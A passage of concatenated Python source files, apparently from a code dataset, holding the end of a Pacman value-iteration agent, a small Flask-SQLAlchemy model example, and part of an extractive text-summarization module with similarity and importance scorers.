self.utilityDictionary = {"NorthUtility": 0.0, "EastUtility": 0.0, "SouthUtility": 0.0, "WestUtility": 0.0}
# Directions with respect to pacman's location
CurrentLocation = (pac[0], pac[1])
North = (pac[0], pac[1] + 1)
East = (pac[0] + 1, pac[1])
South = (pac[0], pac[1] - 1)
West = (pac[0] - 1, pac[1])
# If north of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for east and west of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[North] == "W":
NorthUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
NorthUtility = self.mapWithValues[North] * 0.8
if self.mapWithValues[East] == "W":
NorthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
NorthUtility += self.mapWithValues[East] * 0.1
if self.mapWithValues[West] == "W":
NorthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
NorthUtility += self.mapWithValues[West] * 0.1
# If east of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for north and south of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[East] == "W":
EastUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
EastUtility = self.mapWithValues[East] * 0.8
if self.mapWithValues[North] == "W":
EastUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
EastUtility += self.mapWithValues[North] * 0.1
if self.mapWithValues[South] == "W":
EastUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
EastUtility += self.mapWithValues[South] * 0.1
# If south of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for east and west of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[South] == "W":
SouthUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
SouthUtility = self.mapWithValues[South] * 0.8
if self.mapWithValues[East] == "W":
SouthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
SouthUtility += self.mapWithValues[East] * 0.1
if self.mapWithValues[West] == "W":
SouthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
SouthUtility += self.mapWithValues[West] * 0.1
# If west of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for north and south of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[West] == "W":
WestUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
WestUtility = self.mapWithValues[West] * 0.8
if self.mapWithValues[North] == "W":
WestUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
WestUtility += self.mapWithValues[North] * 0.1
if self.mapWithValues[South] == "W":
WestUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
WestUtility += self.mapWithValues[South] * 0.1
# Dictionary tuples are given the new values calculated
self.utilityDictionary["NorthUtility"] = NorthUtility
self.utilityDictionary["EastUtility"] = EastUtility
self.utilityDictionary["SouthUtility"] = SouthUtility
self.utilityDictionary["WestUtility"] = WestUtility
# Maximum expected utility
meu = max(self.utilityDictionary.values())
# Return the move that has the highest maximum expected utility
return self.utilityDictionary.keys()[self.utilityDictionary.values().index(meu)]
def getAction(self, state):
self.map.display()
legal = api.legalActions(state)
corners = api.corners(state)
Width = self.widthOfLayout(corners) - 1
Height = self.heightOfLayout(corners) - 1
mapOfValues = self.makeMapWithValues(state) # Map will be updated whenever an action is performed
# makes sure the correct value iteration is performed depending on the map
if Width < 10 and Height < 10:
self.valueIterationForSmallGrid(state, (-0.3), 1, mapOfValues)
else:
self.valueIterationForMediumClassic(state, (-0.5), 1, mapOfValues)
# Updates the map with iterated values
for i in range(self.map.getWidth()):
for j in range(self.map.getHeight()):
if self.map.getVal(i, j) != "W":
self.map.setVal(i, j, mapOfValues[(i, j)])
# Return the best direction
if self.policy(state, mapOfValues) == "NorthUtility":
return api.makeMove(Directions.NORTH, legal)
if self.policy(state, mapOfValues) == "EastUtility":
return api.makeMove(Directions.EAST, legal)
if self.policy(state, mapOfValues) == "SouthUtility":
return api.makeMove(Directions.SOUTH, legal)
if self.policy(state, mapOfValues) == "WestUtility":
return api.makeMove(Directions.WEST, legal)
|
10,553 | 08097d4784d145365781cf7fdbdab11959b4b54b | """Alchemy - Flask."""
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://localhost/computers-db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class Computer(db.Model):
"""Notice that all models inherit from SQLAlchemy's db.Model."""
__tablename__ = "computers" # table name will default to name of the model
# Create the three columns for our table
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
memory_in_gb = db.Column(db.Integer)
def __init__(self, name, memory_in_gb):
"""Define what each instance or row in the DB will have.
(id is taken care of for you).
"""
self.name = name
self.memory_in_gb = memory_in_gb
def __repr__(self):
"""Not essential, but a valuable method to overwrite.
This is what we will see when we print out an instance in a REPL.
"""
return "This {} has {} GB of memory".format(
self.name,
self.memory_in_gb
)
|
10,554 | b7cb9b11b94b80cce8944306068e410d4a79a833 | ##########################################################################################################################################
#Required Modules
import re,os,sys
WORD = re.compile(r'\w+')
import string
import math
import time
import collections
import nltk
from nltk.corpus import stopwords
from collections import Counter
from nltk.corpus import wordnet as wn
from nltk.corpus import brown
import numpy as np
from nltk.stem.porter import *
############################################################################################################################################
#THRESHOLDS
class THRESHOLDS:
#Class: Scorers
TFIDFThreshold = 0.0
#Class: StackDecoder
MAXIMUM_LENGTH_SUMMARY_ALLOWED = 100
MINIMUM_LENGTH_SENTENCE_ALLOWED= 6
SIMILARITY_BOUND = 0.5
class PROVIDE_ID:
topic_id_no = -1
doc_id_no = -1
sen_id_no = -1
@staticmethod
def getNexttopic_id_no():
PROVIDE_ID.topic_id_no = PROVIDE_ID.topic_id_no+1
return PROVIDE_ID.topic_id_no
@staticmethod
def getNextdoc_id_no():
PROVIDE_ID.doc_id_no = PROVIDE_ID.doc_id_no+1
return PROVIDE_ID.doc_id_no
@staticmethod
def getNextsen_id_no():
PROVIDE_ID.sen_id_no = PROVIDE_ID.sen_id_no+1
return PROVIDE_ID.sen_id_no
###########################################################################################################################################
#Similarity_Score
class SIMILARITY_SCORE:
def __init__(self):
pass
def get_score(self,sentence1, sentence2):
raise NotImplementedError("Subclass must implement abstract method")
class Jaccard_Similarity (SIMILARITY_SCORE):
def __init__(self):
pass
def text_to_vector(self,list_of_words):
return Counter(list_of_words)
def get_score(self,sentence1, sentence2):
vec1 = self.text_to_vector(sentence1.getList_of_words())
vec2 = self.text_to_vector(sentence2.getList_of_words())
intersection = set(vec1.keys()) & set(vec2.keys())
union = set(vec1.keys()) | set(vec2.keys())
return (len(intersection))/(len(union))
class TF_IDF_Similarity(SIMILARITY_SCORE):
def __init__(self):
pass
def text_to_vector(self,list_of_words):
return Counter(list_of_words)
def get_cosine(self,vec1, vec2):
intersection = set(vec1.keys()) & set(vec2.keys())
numerator = sum([vec1[x] * vec2[x] for x in intersection])
sum1 = sum([vec1[x]**2 for x in vec1.keys()])
sum2 = sum([vec2[x]**2 for x in vec2.keys()])
denominator = math.sqrt(sum1) * math.sqrt(sum2)
if not denominator:
return 0.0
else:
return float(numerator) / denominator
def get_score(self,sentence1, sentence2):
return self.get_cosine(self.text_to_vector(sentence1.getList_of_words()),self.text_to_vector(sentence2.getList_of_words()))
class WORD_NET_SIMILARITY(SIMILARITY_SCORE):
def __init__(self):
self.DELTA = 0.85
self.ALPHA = 0.2
self.BETA = 0.45
self.ETA = 0.4
self.PHI = 0.2
self.brown_freqs = dict()
self.N = 0
######################### word similarity ##########################
def get_best_synset_pair(self,word_1, word_2):
"""
Choose the pair with highest path similarity among all pairs.
Mimics pattern-seeking behavior of humans.
"""
max_sim = -1.0
synsets_1 = wn.synsets(word_1)
synsets_2 = wn.synsets(word_2)
if len(synsets_1) == 0 or len(synsets_2) == 0:
return None, None
else:
max_sim = -1.0
best_pair = None, None
for synset_1 in synsets_1:
for synset_2 in synsets_2:
sim = wn.path_similarity(synset_1, synset_2)
if sim is not None and sim > max_sim:
max_sim = sim
best_pair = synset_1, synset_2
return best_pair
def length_dist(self,synset_1, synset_2):
"""
Return a measure of the length of the shortest path in the semantic
ontology (Wordnet in our case as well as the paper's) between two
synsets.
"""
l_dist = sys.maxsize
if synset_1 is None or synset_2 is None:
return 0.0
if synset_1 == synset_2:
# if synset_1 and synset_2 are the same synset return 0
l_dist = 0.0
else:
wset_1 = set([str(x.name()) for x in synset_1.lemmas()])
wset_2 = set([str(x.name()) for x in synset_2.lemmas()])
if len(wset_1.intersection(wset_2)) > 0:
# if synset_1 != synset_2 but there is word overlap, return 1.0
l_dist = 1.0
else:
# just compute the shortest path between the two
l_dist = synset_1.shortest_path_distance(synset_2)
if l_dist is None:
l_dist = 0.0
# normalize path length to the range [0,1]
return math.exp(-self.ALPHA * l_dist)
def hierarchy_dist(self,synset_1, synset_2):
"""
Return a measure of depth in the ontology to model the fact that
nodes closer to the root are broader and have less semantic similarity
than nodes further away from the root.
"""
h_dist = sys.maxsize
if synset_1 is None or synset_2 is None:
return h_dist
if synset_1 == synset_2:
# return the depth of one of synset_1 or synset_2
h_dist = max([x[1] for x in synset_1.hypernym_distances()])
else:
# find the max depth of least common subsumer
hypernyms_1 = {x[0]:x[1] for x in synset_1.hypernym_distances()}
hypernyms_2 = {x[0]:x[1] for x in synset_2.hypernym_distances()}
lcs_candidates = set(hypernyms_1.keys()).intersection(
set(hypernyms_2.keys()))
if len(lcs_candidates) > 0:
lcs_dists = []
for lcs_candidate in lcs_candidates:
lcs_d1 = 0
if lcs_candidate in hypernyms_1.keys():
lcs_d1 = hypernyms_1[lcs_candidate]
lcs_d2 = 0
if lcs_candidate in hypernyms_2.keys():
lcs_d2 = hypernyms_2[lcs_candidate]
lcs_dists.append(max([lcs_d1, lcs_d2]))
h_dist = max(lcs_dists)
else:
h_dist = 0
return ((math.exp(self.BETA * h_dist) - math.exp(-self.BETA * h_dist)) /
(math.exp(self.BETA * h_dist) + math.exp(-self.BETA * h_dist)))
def word_similarity(self,word_1, word_2):
synset_pair = self.get_best_synset_pair(word_1, word_2)
return (self.length_dist(synset_pair[0], synset_pair[1]) *
self.hierarchy_dist(synset_pair[0], synset_pair[1]))
######################### sentence similarity ##########################
def most_similar_word(self,word, word_set):
"""
Find the word in the joint word set that is most similar to the word
passed in. We use the algorithm above to compute word similarity between
the word and each word in the joint word set, and return the most similar
word and the actual similarity value.
"""
max_sim = -1.0
sim_word = ""
for ref_word in word_set:
sim = self.word_similarity(word, ref_word)
if sim > max_sim:
max_sim = sim
sim_word = ref_word
return sim_word, max_sim
def info_content(self,lookup_word):
"""
Uses the Brown corpus available in NLTK to calculate a Laplace
smoothed frequency distribution of words, then uses this information
to compute the information content of the lookup_word.
"""
if self.N == 0:
# poor man's lazy evaluation
for sent in brown.sents():
for word in sent:
word = word.lower()
if not word in self.brown_freqs.keys():
self.brown_freqs[word] = 0
self.brown_freqs[word] = self.brown_freqs[word] + 1
self.N = self.N + 1
lookup_word = lookup_word.lower()
n = 0 if not lookup_word in self.brown_freqs.keys() else self.brown_freqs[lookup_word]
return 1.0 - (math.log(n + 1) / math.log(self.N + 1))
def semantic_vector(self,words, joint_words, info_content_norm):
"""
Computes the semantic vector of a sentence. The sentence is passed in as
a collection of words. The size of the semantic vector is the same as the
size of the joint word set. The elements are 1 if a word in the sentence
already exists in the joint word set, or the similarity of the word to the
most similar word in the joint word set if it doesn't. Both values are
further normalized by the word's (and similar word's) information content
if info_content_norm is True.
"""
sent_set = set(words)
semvec = np.zeros(len(joint_words))
i = 0
for joint_word in joint_words:
if joint_word in sent_set:
# if word in union exists in the sentence, s(i) = 1 (unnormalized)
semvec[i] = 1.0
if info_content_norm:
semvec[i] = semvec[i] * math.pow(self.info_content(joint_word), 2)
else:
# find the most similar word in the joint set and set the sim value
sim_word, max_sim = self.most_similar_word(joint_word, sent_set)
semvec[i] = self.PHI if max_sim > self.PHI else 0.0
if info_content_norm:
semvec[i] = semvec[i] * self.info_content(joint_word) * self.info_content(sim_word)
i = i + 1
return semvec
def semantic_similarity(self,sentence_1, sentence_2, info_content_norm):
"""
Computes the semantic similarity between two sentences as the cosine
similarity between the semantic vectors computed for each sentence.
"""
words_1 = sentence_1.getList_of_words()
words_2 = sentence_2.getList_of_words()
joint_words = set(words_1).union(set(words_2))
vec_1 = self.semantic_vector(words_1, joint_words, info_content_norm)
vec_2 = self.semantic_vector(words_2, joint_words, info_content_norm)
return np.dot(vec_1, vec_2.T) / (np.linalg.norm(vec_1) * np.linalg.norm(vec_2))
######################### word order similarity ##########################
def word_order_vector(self,words, joint_words, windex):
"""
Computes the word order vector for a sentence. The sentence is passed
in as a collection of words. The size of the word order vector is the
same as the size of the joint word set. The elements of the word order
vector are the position mapping (from the windex dictionary) of the
word in the joint set if the word exists in the sentence. If the word
does not exist in the sentence, then the value of the element is the
position of the most similar word in the sentence as long as the similarity
is above the threshold self.ETA.
"""
wovec = np.zeros(len(joint_words))
i = 0
wordset = set(words)
for joint_word in joint_words:
if joint_word in wordset:
# word in joint_words found in sentence, just populate the index
wovec[i] = windex[joint_word]
else:
# word not in joint_words, find most similar word and populate
# word_vector with the thresholded similarity
sim_word, max_sim = self.most_similar_word(joint_word, wordset)
if max_sim > self.ETA:
wovec[i] = windex[sim_word]
else:
wovec[i] = 0
i = i + 1
return wovec
def word_order_similarity(self,sentence_1, sentence_2):
"""
Computes the word-order similarity between two sentences as the normalized
difference of word order between the two sentences.
"""
words_1 = sentence_1.getList_of_words()
words_2 = sentence_2.getList_of_words()
joint_words = list(set(words_1).union(set(words_2)))
windex = {x[1]: x[0] for x in enumerate(joint_words)}
r1 = self.word_order_vector(words_1, joint_words, windex)
r2 = self.word_order_vector(words_2, joint_words, windex)
return 1.0 - (np.linalg.norm(r1 - r2) / np.linalg.norm(r1 + r2))
######################### overall similarity ##########################
def get_score(self,sentence_1, sentence_2):
"""
Calculate the semantic similarity between two sentences. The last
parameter is True or False depending on whether information content
normalization is desired or not.
"""
return self.DELTA * self.semantic_similarity(sentence_1, sentence_2, True) + (1.0 - self.DELTA) * self.word_order_similarity(sentence_1, sentence_2)
#############################################################################################################################################
#Models
class Sentence:
def __init__(self, sen_id_no, senLength, list_of_words, actual_sentence, location_in_sentence, doc_id_no):
self.location_in_sentence = 0
self.score = 0
self.sen_id_no = sen_id_no
self.sentenceLength = senLength
#self.list_of_words = self.preProcess(list_of_words)
self.list_of_words = list_of_words
self.actual_sentence = actual_sentence
self.location_in_sentence = location_in_sentence
self.doc_id_no = doc_id_no
self.partOfHumanSummary = False
self.isPositiveSample = False
def setActual_sentence(self, actual_sentence):
self.actual_sentence = actual_sentence
def isPartOfHumanSummary(self):
return self.partOfHumanSummary
def setPartOfHumanSummary(self, value):
self.partOfHumanSummary = value
def getLocation_in_sentence(self):
return self.location_in_sentence
def setLocation_in_sentence(self, location_in_sentence):
self.location_in_sentence = location_in_sentence
def getdoc_id_no(self):
return self.doc_id_no
def getList_of_words(self):
return self.list_of_words
def getScore(self):
return self.score
def setScore(self, score):
self.score = score
def getActual_sentence(self):
return self.actual_sentence
def isPositiveSample(self):
return self.isPositiveSample
def setPositiveSample(self, isPositiveSample):
self.isPositiveSample = isPositiveSample
def getSentenceLength(self):
return self.sentenceLength
def getId(self):
return ""+str(self.sen_id_no)
def toString(self):
return self.getActual_sentence() + " - " + str(self.getScore())
def preProcess(self,list_of_words):
stemmer = PorterStemmer()
result = []
for i in list_of_words:
if i not in stopwords.words('english'):
result.append(stemmer.stem(i))
return result
class Document:
def __init__(self, sentences=[], filename="", doc_id_no=0):
self.sentences = sentences
self.filename = filename
self.doc_id_no = doc_id_no
def addSentence(self, sentence):
self.sentences.append(sentence)
def getSentences(self):
return self.sentences
def getdoc_id_no(self):
return self.doc_id_no
def getNumberOfSentences(self):
return len(self.sentences)
class Summary(Document):
def __init__(self,filename=None,doc_id_no=0,isHuman=False):
self.isHuman = isHuman
if filename is not None:
super().__init__(SentenceProcessor.getSentences(filename,doc_id_no),filename,doc_id_no)
def isHuman (self):
return self.isHuman
class Topic:
def __init__(self, filename=None, topic_id_no=123456):
self.summaries = []
self.sentenceMap = {}
if filename is not None:
self.documents = SentenceProcessor.getDocuments(filename,self.sentenceMap)
else:
self.documents = []
self.topic_id_no = topic_id_no
def getSentenceMap(self):
return self.sentenceMap
def addDocument(self,doc):
self.documents.append(doc)
def getDocuments(self):
return self.documents
def addSummary(self,s):
self.summaries.append(s)
def getSummaries(self):
return self.summaries
def gettopic_id_no(self):
return self.topic_id_no
class DataSet:
def __init__(self,dirPath=None):
self.topicMap={}
self.nameMap={}
self.simScorer = TF_IDF_Similarity()
self.EXT_SUMMARY = "sum"
self.EXT_SOURCE = "txt"
if dirPath is not None:
topic_id_no=0
files = self.getFiles(dirPath)
t = None
s = None
#Process Topics
for file in files:
fname = file.split('/')
fname = fname[-1]
fname = fname.split('.')
file_name = fname[0]
extension = fname[-1]
if(extension == self.EXT_SOURCE):
print("Processing: " + file)
topic_id_no = PROVIDE_ID.getNexttopic_id_no()
t = Topic(file, topic_id_no)
topic = file_name
self.topicMap[topic] = t
self.nameMap[topic_id_no] = topic
#Add Summaries
for file in files:
fname = file.split('/')
fname = fname[-1]
fname = fname.split('.')
file_name = fname[0]
extension = fname[-1]
if(extension == self.EXT_SUMMARY):
print("Processing: " + file)
s = Summary(file, PROVIDE_ID.getNextdoc_id_no(), True);
topic = file_name
t = self.topicMap[topic]
t.addSummary(s);
def getFiles(self,path):
files = [f for f in os.listdir(path) if (f.endswith(self.EXT_SOURCE) or f.endswith(self.EXT_SUMMARY))]
fileNames = sorted(files, key=lambda y: (y.rsplit('.')[0]))
result = [os.path.join(path,f) for f in fileNames]
return result
def calculateImportanceScores(self,weights):
for t in self.topicMap.values():
totalSet = []
for doc in t.getDocuments():
totalSet.append(doc)
for summary in t.getSummaries():
totalSet.append(summary)
impModule = ImportanceModule(totalSet)
impModule.setWeightsForImpScorers(weights)
impModule.setValues(totalSet)
def getTopicMapSize(self):
return len(self.topicMap)
def getTopic(self, key):
return self.topicMap[key]
def getTopicName(self,topic_id_no):
return self.nameMap[topic_id_no]
def getTopicMap(self):
return self.topicMap
def getTopics(self):
res = []
for t in self.topicMap.values():
res.append(t)
return res
def getTopicNames(self):
res = []
for t in self.topicMap.keys():
res.append(t)
return res
############################################################################################################################################
#Sentence Preprocessor
class SentenceProcessor:
SENTENCE_MARKER = "Sentence:"
WORD_MARKER = "\tS:"
PUNCTUATION = "\"'`!?&_/\\);][<>~@-({}:"
TERMINAL = "#"
@staticmethod
def getDocuments(filename,sentenceMap):
documents = []
sentences = []
lineNum=0
doc_id_no = PROVIDE_ID.getNextdoc_id_no()
f = open(filename, "r")
text = None
noSpace = False
text = f.readline()
while(text is not None and text.strip() == SentenceProcessor.SENTENCE_MARKER):
#Sentence starts
senLength=0
sb = ""
list_of_words= []
lineNum = lineNum+1
while (text is not None):
text = f.readline()
if(text is not None and not (text =="") and not (text.strip()==SentenceProcessor.SENTENCE_MARKER)):
if(not text.startswith(SentenceProcessor.WORD_MARKER)):
continue
word = text.split("S: ")[1]
word = word.replace('\n','')
#filter spurious chars
if word in SentenceProcessor.PUNCTUATION:
continue
else:
if(word == ",") or (word == "."):
noSpace=True
if word.strip()==SentenceProcessor.TERMINAL:
#Document ends
d = Document(sentences, filename, doc_id_no)
documents.append(d)
lineNum=0
sentences = []
doc_id_no = PROVIDE_ID.getNextdoc_id_no()
text = f.readline()
break
split=None
cWord = ""
if '-' in word:
splitted = word.split("-")
senLength = senLength+1
for cword in splitted:
cWord = word.replace("\\W", "");
if len(cWord)>0:
list_of_words.append(cWord)
else:
cWord = word.replace("\\W", "")
if len(cWord)>0:
senLength = senLength+1
list_of_words.append(cWord)
if len(sb)== 0:
sb += word
else:
if noSpace:
noSpace = False
sb += word
else:
sb+=' '
sb += word
else:
break
if(len(list_of_words)>0 and len(sb)>0):
id_no = PROVIDE_ID.getNextsen_id_no()
s = Sentence(id_no, senLength, list_of_words, sb, lineNum, doc_id_no)
sentences.append(s)
sentenceMap[id_no] = s
return documents
@staticmethod
def getSentences(filename,doc_id_no):
sentences = []
lineNum=0
f = open(filename, "r")
text = None
noSpace = False
text = f.readline()
while(text is not None and text.strip().startswith(SentenceProcessor.SENTENCE_MARKER)):
#Sentence starts
senLength=0
sb = ""
list_of_words= []
lineNum = lineNum+1
while (text is not None):
text = f.readline()
if(text is not None and not (text =="") and not (text.strip().startswith(SentenceProcessor.SENTENCE_MARKER))):
if(not text.startswith(SentenceProcessor.WORD_MARKER)):
continue
word = text.split("S: ")[1]
word = word.replace('\n','')
#filter spurious chars
if word in SentenceProcessor.PUNCTUATION:
continue
else:
if(word == ",") or (word == "."):
noSpace=True
split=None
cWord = ""
if '-' in word:
splitted = word.split("-")
senLength = senLength+1
for cword in splitted:
cWord = word.replace("\\W", "");
if len(cWord)>0:
list_of_words.append(cWord)
else:
cWord = word.replace("\\W", "")
if len(cWord)>0:
senLength = senLength+1
list_of_words.append(cWord)
if len(sb)== 0:
sb += word
else:
if noSpace:
noSpace = False
sb += word
else:
sb+=' '
sb += word
else:
break
if(len(list_of_words)>0 and len(sb)>0):
id_no = PROVIDE_ID.getNextsen_id_no()
s = Sentence(id_no, senLength, list_of_words, sb, lineNum, doc_id_no)
s.setPositiveSample(True)
s.setPartOfHumanSummary(True)
sentences.append(s)
return sentences
###############################################################################################################################################
#Importance Scorers
class ImportanceScorer:
def __init__(self):
pass
def initialize(self,docs):
raise NotImplementedError("Subclass must implement abstract method")
def getImportanceScore(self,doc,sentence):
raise NotImplementedError("Subclass must implement abstract method")
def setWeightage(self,weight):
raise NotImplementedError("Subclass must implement abstract method")
def getWeightage(self):
raise NotImplementedError("Subclass must implement abstract method")
def getName(self):
raise NotImplementedError("Subclass must implement abstract method")
class UpperCaseCalculator(ImportanceScorer):
def __init__(self):
self.docMap = None
self.weightage = 1.0
def initialize(self,docs):
docMap = {}
for doc in docs:
pair = self.getDocStats(doc)
docMap[doc.getdoc_id_no()] = pair
self.docMap = docMap
def getDocStats(self,doc):
p = Pair()
for sent in doc.getSentences():
p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
p.avg /= doc.getNumberOfSentences()
for sent in doc.getSentences():
p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
p.stdDev /= doc.getNumberOfSentences()
p.stdDev = math.sqrt(p.stdDev)
return p
def getSentenceSum(self,docId,s):
score = 0.0
for word in s.getList_of_words():
score += self.getWordScore(s.getdoc_id_no(), word)
return score
def getWordScore(self,docId, word):
word = word.strip()
if len(word)>0:
ascii = ord(word[0])
if ascii >= 65 and ascii <= 90:
return 1
return 0
def getImportanceScore(self, doc, sentence):
p = None
if doc.getdoc_id_no() in self.docMap:
p = self.docMap[doc.getdoc_id_no()]
else:
p = self.getDocStats(doc)
self.docMap[doc.getdoc_id_no()] = p
score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
return float(score)/sentence.getSentenceLength()
def getName(self):
return "UpperCaseCalculator"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class Pair:
def __init__(self):
self.avg = 0
self.stdDev = 0
class NounsCalculator(ImportanceScorer):
def __init__(self):
self.docMap = None
self.weightage = 1.0
def initialize(self,docs):
docMap = {}
for doc in docs:
pair = self.getDocStats(doc)
docMap[doc.getdoc_id_no()] = pair
self.docMap = docMap
def getDocStats(self,doc):
p = Pair()
for sent in doc.getSentences():
p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
p.avg /= doc.getNumberOfSentences()
for sent in doc.getSentences():
p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
p.stdDev /= doc.getNumberOfSentences()
p.stdDev = math.sqrt(p.stdDev)
return p
def getSentenceSum(self,docId,s):
score = 0.0
tags = nltk.pos_tag(s.getList_of_words())
for tuple in tags:
if tuple[1]=='NN' or tuple[1]=='NNP' or tuple[1]=='NNS':
score = score+1
return score
def getImportanceScore(self, doc, sentence):
p = None
if doc.getdoc_id_no() in self.docMap:
p = self.docMap[doc.getdoc_id_no()]
else:
p = self.getDocStats(doc)
self.docMap[doc.getdoc_id_no()] = p
score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
return float(score)/sentence.getSentenceLength()
def getName(self):
return "UpperCaseCalculator"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class VerbsCalculator(ImportanceScorer):
def __init__(self):
self.docMap = None
self.weightage = 1.0
def initialize(self,docs):
docMap = {}
for doc in docs:
pair = self.getDocStats(doc)
docMap[doc.getdoc_id_no()] = pair
self.docMap = docMap
def getDocStats(self,doc):
p = Pair()
for sent in doc.getSentences():
p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
p.avg /= doc.getNumberOfSentences()
for sent in doc.getSentences():
p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
p.stdDev /= doc.getNumberOfSentences()
p.stdDev = math.sqrt(p.stdDev)
return p
def getSentenceSum(self,docId,s):
score = 0.0
tags = nltk.pos_tag(s.getList_of_words())
for tuple in tags:
if tuple[1]=='VB' or tuple[1]=='VBD' or tuple[1]=='VBG' or tuple[1]=='VBN' or tuple[1]=='VBP' or tuple[1]=='VBZ':
score = score+1
return score
def getImportanceScore(self, doc, sentence):
p = None
if doc.getdoc_id_no() in self.docMap:
p = self.docMap[doc.getdoc_id_no()]
else:
p = self.getDocStats(doc)
self.docMap[doc.getdoc_id_no()] = p
score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
return float(score)/sentence.getSentenceLength()
def getName(self):
return "UpperCaseCalculator"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class AdjectivesCalculator(ImportanceScorer):
def __init__(self):
self.docMap = None
self.weightage = 1.0
def initialize(self,docs):
docMap = {}
for doc in docs:
pair = self.getDocStats(doc)
docMap[doc.getdoc_id_no()] = pair
self.docMap = docMap
def getDocStats(self,doc):
p = Pair()
for sent in doc.getSentences():
p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
p.avg /= doc.getNumberOfSentences()
for sent in doc.getSentences():
p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
p.stdDev /= doc.getNumberOfSentences()
p.stdDev = math.sqrt(p.stdDev)
return p
def getSentenceSum(self,docId,s):
score = 0.0
tags = nltk.pos_tag(s.getList_of_words())
for tuple in tags:
if tuple[1]=='JJ' or tuple[1]=='JJR' or tuple[1]=='JJS':
score = score+1
return score
def getImportanceScore(self, doc, sentence):
p = None
if doc.getdoc_id_no() in self.docMap:
p = self.docMap[doc.getdoc_id_no()]
else:
p = self.getDocStats(doc)
self.docMap[doc.getdoc_id_no()] = p
score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
return float(score)/sentence.getSentenceLength()
def getName(self):
return "UpperCaseCalculator"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class SentenceLengthCalculator(ImportanceScorer):
def __init__(self):
self.docMap = None
self.weightage = 1.0
def initialize(self,docs):
docMap = {}
for doc in docs:
pair = self.getDocStats(doc)
docMap[doc.getdoc_id_no()] = pair
self.docMap = docMap
def getDocStats(self,doc):
p = Pair()
for sent in doc.getSentences():
p.avg += sent.getSentenceLength()
p.avg /= doc.getNumberOfSentences()
for sent in doc.getSentences():
p.stdDev += (sent.getSentenceLength() - p.avg)**2
p.stdDev /= doc.getNumberOfSentences()
p.stdDev = math.sqrt(p.stdDev)
return p
def getImportanceScore(self, doc, sentence):
p = None
if doc.getdoc_id_no() in self.docMap:
p = self.docMap[doc.getdoc_id_no()]
else:
p = self.getDocStats(doc)
self.docMap[doc.getdoc_id_no()] = p
return sentence.getSentenceLength()
def getName(self):
return "SentLength"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class NumLiteralsCalculator(ImportanceScorer):
def __init__(self):
self.docMap = None
self.weightage = 1.0
def initialize(self,docs):
docMap = {}
for doc in docs:
pair = self.getDocStats(doc)
docMap[doc.getdoc_id_no()] = pair
self.docMap = docMap
def getDocStats(self,doc):
p = Pair()
for sent in doc.getSentences():
p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
p.avg /= doc.getNumberOfSentences()
for sent in doc.getSentences():
p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
p.stdDev /= doc.getNumberOfSentences()
p.stdDev = math.sqrt(p.stdDev)
return p
def getSentenceSum(self,docId,s):
score = 0.0
for word in s.getList_of_words():
score += self.getWordScore(s.getdoc_id_no(), word)
return score
def getWordScore(self,docId, word):
score = 0
word = word.strip()
if len(word)>0:
try:
float(word)
score = 1
except:
score = 0
return score
def getImportanceScore(self, doc, sentence):
p = None
if doc.getdoc_id_no() in self.docMap:
p = self.docMap[doc.getdoc_id_no()]
else:
p = self.getDocStats(doc)
self.docMap[doc.getdoc_id_no()] = p
score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
if p.stdDev!=0:
alpha = (score - p.avg) / p.stdDev
else:
alpha = 0
alpha = float(alpha)
return score/sentence.getSentenceLength()
def getName(self):
return "NumLiteralsCalculator"
def getWeightage(self):
return self.weightage
def setWeightage(self, weight):
self.weightage = weight
class SentencePosCalculator(ImportanceScorer):
def __init__(self):
self.weightage = 1.0
def initialize(self,docs):
pass
#Do Nothing
def getImportanceScore(self, doc, sentence):
totSentences = doc.getNumberOfSentences()
